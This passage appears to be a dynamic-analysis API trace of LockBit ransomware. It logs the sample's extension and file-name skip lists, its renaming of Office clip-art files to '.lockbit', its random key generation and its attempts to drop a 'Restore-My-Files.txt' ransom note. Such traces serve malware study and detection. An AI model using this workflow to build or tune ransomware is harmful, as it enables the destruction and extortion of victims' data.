lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.929] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.929] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF.lockbit") returned 72 [0118.929] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.930] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.930] malloc (_Size=0x40068) returned 0x3df0008 [0118.930] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9172) returned 1 [0118.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0118.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0118.931] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0118.957] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.957] malloc (_Size=0xa6) returned 0x77d7a8 [0118.958] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.958] free (_Block=0x77d7a8) [0118.958] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.959] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.959] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec9b2000, ftCreationTime.dwHighDateTime=0x1bd4bf2, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xec9b2000, ftLastWriteTime.dwHighDateTime=0x1bd4bf2, nFileSizeHigh=0x0, nFileSizeLow=0x31cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00915_.WMF", cAlternateFileName="")) returned 1 [0118.959] lstrcmpiW (lpString1=".", lpString2="IN00915_.WMF") returned -1 [0118.959] lstrcmpiW (lpString1="..", lpString2="IN00915_.WMF") returned -1 [0118.959] PathFindExtensionW (pszPath="IN00915_.WMF") returned=".WMF" [0118.959] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.959] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.960] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.960] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00915_.WMF") returned 1 [0118.961] lstrcmpiW (lpString1="ntldr", lpString2="IN00915_.WMF") returned 1 [0118.961] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00915_.WMF") returned 1 [0118.961] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00915_.WMF") returned -1 [0118.961] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00915_.WMF") returned -1 [0118.961] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00915_.WMF") returned 1 [0118.961] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00915_.WMF") returned -1 [0118.961] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.961] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned=".WMF" [0118.961] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.961] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.961] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.962] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.962] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.962] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.962] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.962] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.962] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.962] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.962] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF.lockbit") returned 72 [0118.962] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.967] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.967] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.967] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12748) returned 1 [0118.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.968] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.968] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.970] malloc (_Size=0xa6) returned 0x77d7a8 [0118.970] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.971] free (_Block=0x77d7a8) [0118.971] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.971] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.971] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.971] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5570a100, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x61cf3090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5570a100, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1b08, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00919_.WMF", cAlternateFileName="")) returned 1 [0118.972] lstrcmpiW (lpString1=".", lpString2="IN00919_.WMF") returned -1 [0118.972] lstrcmpiW (lpString1="..", lpString2="IN00919_.WMF") returned -1 [0118.972] PathFindExtensionW (pszPath="IN00919_.WMF") returned=".WMF" [0118.972] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.973] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.973] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00919_.WMF") returned 1 [0118.974] lstrcmpiW (lpString1="ntldr", lpString2="IN00919_.WMF") returned 1 [0118.974] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00919_.WMF") returned 1 [0118.974] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00919_.WMF") returned -1 [0118.974] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00919_.WMF") returned -1 [0118.974] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00919_.WMF") returned 1 [0118.974] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00919_.WMF") returned -1 [0118.974] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.974] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned=".WMF" [0118.974] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.974] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.974] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.975] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.975] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF.lockbit") returned 72 [0118.975] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0118.976] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.976] malloc (_Size=0x40068) returned 0x3e70008 [0118.976] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=6920) returned 1 [0118.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0118.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0118.977] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0118.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.983] malloc (_Size=0xa6) returned 0x77d7a8 [0118.983] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.984] free (_Block=0x77d7a8) [0118.984] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.984] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.984] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.984] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a750c00, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7a750c00, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x4e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00956_.WMF", cAlternateFileName="")) returned 1 [0118.984] lstrcmpiW (lpString1=".", lpString2="IN00956_.WMF") returned -1 [0118.984] lstrcmpiW (lpString1="..", lpString2="IN00956_.WMF") returned -1 [0118.984] PathFindExtensionW (pszPath="IN00956_.WMF") returned=".WMF" [0118.984] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.984] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.984] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.984] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.984] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.984] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.984] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 